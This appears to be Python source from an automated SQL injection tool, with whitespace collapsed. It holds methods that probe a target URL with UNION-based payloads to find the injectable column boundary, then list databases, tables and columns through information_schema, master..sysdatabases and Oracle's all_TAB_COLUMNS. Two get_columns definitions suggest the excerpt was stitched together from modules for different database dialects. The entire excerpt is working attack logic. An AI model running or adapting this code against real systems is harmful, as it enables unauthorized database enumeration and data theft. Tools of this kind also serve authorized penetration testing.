def set_actual_boundary(self): is_set = False token = '10000' table_name = "information_schema.schemata" self.set_query(SQL.query) l = ["NULL"] * 25 for i in range(25): temp = copy.deepcopy(l) temp[i] = token col_name = [','.join(temp[:i + 1])] payload, _ = self.get_payload(table_name, col_name) url = conf.url res = req.connection(url, payload) text = res.text if token in text: break l = ["NULL"] * 3 token = format_hex(random_str()) for i in range(len(l)): pack = copy.deepcopy(l) pack[i] = token col_name = [','.join(pack)] payload, _ = self.get_payload(table_name, col_name) url = conf.url res = req.connection(url, payload) text = res.text if un_hex(token) in text: boudary = payload.replace( token, "concat(0x3a2d2d3a,%query,0x3a2d2d3a)") self.ini_boundary = boudary self.set_boundary(boudary) is_set = True break if not is_set: logger.error("Set Boundary Error!!!") sys.exit(0)
def get_dbs(self): table_name = 'master..sysdatabases' col_name = ["name"] self.set_query(SQL.query) counts = self.get_counts(table_name, col_name) logger.info("all dbs counts is :%s" % counts) self.reset_query() dbs = [] for i in range(1, int(counts) + 1): payload, token = self.get_payload(table_name, col_name, str(i)) url = conf.url res = req.connection(url, payload=payload) db = self.get_value_from_response(res.text, token) dbs.append(db) logger.info("Ent:" + db) return dbs
def get_columns(self, db, table): table_name = 'information_schema.columns' col_name = ["column_name"] query = SQL.query_col.replace("{db}", format_hex(db)).replace( "{table}", format_hex(table)) self.set_query(query) counts = self.get_counts(table_name, col_name) columns = [] for i in range(int(counts)): payload, token = self.get_payload(table_name, col_name, str(i)) url = conf.url res = req.connection(url, payload=payload) col = self.get_value_from_response(res.text, token) columns.append(col) logger.info("Ent:" + col) return columns
def get_tables(self, db): table_name = 'information_schema.tables' col_name = ["table_name"] query = SQL.query_tab.replace("{db}", format_hex(db)) self.set_query(query) counts = self.get_counts(table_name, col_name) logger.info("all dbs counts is :%s" % counts) tables = [] for i in range(int(counts)): payload, token = self.get_payload(table_name, col_name, str(i)) url = conf.url res = req.connection(url, payload=payload) table = self.get_value_from_response(res.text, token) tables.append(table) logger.info("Ent:" + table) return tables
def get_columns(self, db, table): table_name = 'all_TAB_COLUMNS' col_name = ["column_name"] query = SQL.query_all_col.replace("{db}", "'{0}'").replace( "{table}", "'{1}'").format(db, table) self.set_query(query) counts = self.get_counts(table_name, col_name) query = SQL.query_col.replace("{db}", "'{0}'").replace( "{table}", "'{1}'").format(db, table) self.set_query(query) columns = [] for i in range(1, int(counts) + 1): payload, token = self.get_payload(table_name, col_name, str(i)) url = conf.url res = req.connection(url, payload=payload) col = self.get_value_from_response(res.text, token) columns.append(col) logger.info("Ent:" + col) return columns